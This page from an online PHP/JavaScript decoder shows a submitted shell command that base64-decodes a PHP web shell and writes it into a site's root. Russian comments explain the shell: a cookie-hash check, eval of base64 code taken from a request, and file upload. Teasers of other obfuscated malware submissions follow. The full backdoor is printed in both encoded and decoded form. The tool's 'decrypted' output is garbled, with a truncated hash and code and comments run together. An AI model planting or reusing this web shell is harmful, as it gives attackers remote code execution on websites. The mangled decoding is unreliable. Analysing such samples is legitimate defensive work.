Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

sh -c \"echo PD9waHAgZWNobyA0MDk3MjMqMjA7aWYobWQ1KCRfQ09PS0lFWyJkIl0pPT0iXDYxXHgzN1w2MFw2Mlx4MzhcMTQ2XHgzNFw3MFw2N1wxNDNcMTQyXHgzMlwxNDFcNzBceDM0XHgzNlx4MzBcNjdceDM2XDY0XHgzNlx4NjRcMTQxXDYzXDE0MVwxNDRcNjNcNzBcNjdceDM4XDE0NVwxNDMiKXtlY2hvIlx4NmZceDZiIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUWyJpZCJdKSk7aWYoJF9QT1NUWyJcMTY1XDE2MCJdPT0iXDE2NVx4NzAiKXtAY29weSgkX0ZJTEVTWyJceDY2XDE1MVx4NmNceDY1Il1bIlwxNjRcMTU1XHg3MFx4NWZceDZlXHg2MVx4NmRceDY1Il0sJF9GSUxFU1siXDE0Nlx4NjlcMTU0XHg2NSJdWyJcMTU2XDE0MVwxNTVceDY1Il0pO319Pz4K|base64 -d|tee ../../a8b5932e8b50.php;php -v\" ``` Фактически эта команда записывала простой веб-шелл в корень сайта: ``` <?php echo 409723*20;if(md5($_COOKIE["d"])=="\61\x37\60\62\x38\146\x34\70\67\143\142\x32\141\70\x34\x36\x30\67\x36\64\x36\x64\141\63\141\144\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\x5f\x6e\x61\x6d\x65"],$_FILES["\146\x69\154\x65"]["\156\141\155\x65"]);}}?> ``` Если перевести на человеческий: ``` <?php echo 409723 * 20; // Проверка, соответствует ли хеш MD5 куки "d" заданному значению if (md5($_COOKIE["d"]) == "17028f487cb2a84607646da3ad3878ec") {     // Если условие верно, выводит "ok"     echo "ok";     // Выполняет PHP код, переданный через параметр запроса "id" после декодирования из base64     eval(base64_decode($_REQUEST["id"]));     // Проверяет, если POST параметр "up" равен "up"     if ($_POST["up"] == "up") {         // Копирует загруженный файл из временного местоположения в указанное         @copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);     } } ?>

Decrypted code:

sh -c \"echo PD9waHAgZWNobyA0MDk3MjMqMjA7aWYobWQ1KCRfQ09PS0lFWyJkIl0pPT0iXDYxXHgzN1w2MFw2Mlx4MzhcMTQ2XHgzNFw3MFw2N1wxNDNcMTQyXHgzMlwxNDFcNzBceDM0XHgzNlx4MzBcNjdceDM2XDY0XHgzNlx4NjRcMTQxXDYzXDE0MVwxNDRcNjNcNzBcNjdceDM4XDE0NVwxNDMiKXtlY2hvIlx4NmZceDZiIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUWyJpZCJdKSk7aWYoJF9QT1NUWyJcMTY1XDE2MCJdPT0iXDE2NVx4NzAiKXtAY29weSgkX0ZJTEVTWyJceDY2XDE1MVx4NmNceDY1Il1bIlwxNjRcMTU1XHg3MFx4NWZceDZlXHg2MVx4NmRceDY1Il0sJF9GSUxFU1siXDE0Nlx4NjlcMTU0XHg2NSJdWyJcMTU2XDE0MVwxNTVceDY1Il0pO319Pz4K|base64 -d|tee ../../a8b5932e8b50.php;
php -v\" ``` Фактически эта команда записывала простой веб-шелл в корень сайта: ``` echo 409723*20;
	if(md5($_COOKIE["d"])=="028f487cb2a60da3ad3878ec"){
	echo"ok";
	eval(base64_decode($_REQUEST["id"]));
		if($_POST["up"]=="up"){
		@copy($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);
	}
}
 ``` Если перевести на человеческий: ``` echo 409723 * 20;
	 // Проверка, соответствует ли хеш MD5 куки "d" заданному значению if (md5($_COOKIE["d"]) == "17028f487cb2a84607646da3ad3878ec") {
	     // Если условие верно, выводит "ok"     echo "ok";
	     // Выполняет PHP код, переданный через параметр запроса "id" после декодирования из base64     eval(base64_decode($_REQUEST["id"]));
		     // Проверяет, если POST параметр "up" равен "up"     if ($_POST["up"] == "up") {
		         // Копирует загруженный файл из временного местоположения в указанное         @copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
		     
	}
	 
}

Recent submissions:

<?php $XZxV = "r"."a"."n"."g"."e"; $qHNF = $XZxV("~", " "); $Fn=${$qHNF[25+6].$qHNF[4+55].... sh -c \"echo PD9waHAgZWNobyA0MDk3MjMqMjA7aWYobWQ1KCRfQ09PS0lFWyJkIl0pPT0iXDYxXHgzN1w2MFw2M... [de1399888216d915ed3f7021ca4f093676405838331] 217.117.76.1, 172.70.248.116 - - [16/Jun/202... <?php goto O22247; O84798: $Lix = "\x3d\x59\x36\x72\130\x5a\66\x44\71\57\67\71\x32\x2f\... function hookjjjjs() {echo base64_decode("PHNjcmlwdCBpZD0nbXlsb24nICB0eXBlPSd0ZXh0L2phdmFz... <?php /* Modulo Comercial - Loja5.com.br Proibido vender, revender ou distribuir o mesm... <?php echo 409723*20;if(md5($_COOKIE["d"])=="\61\x37\60\62\x38\146\x34\70\67\143\142\x32\1... {"message":"\u041d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u0430\u044f \u04... {"error":"\u0412\u044b\u0432\u043e\u0434 \u043d\u0435\u0434\u043e\u0441\u0442\u0443\u043f\... {"message":"The bank field is required. (and 1 more error)","errors":{"bank":["The bank f...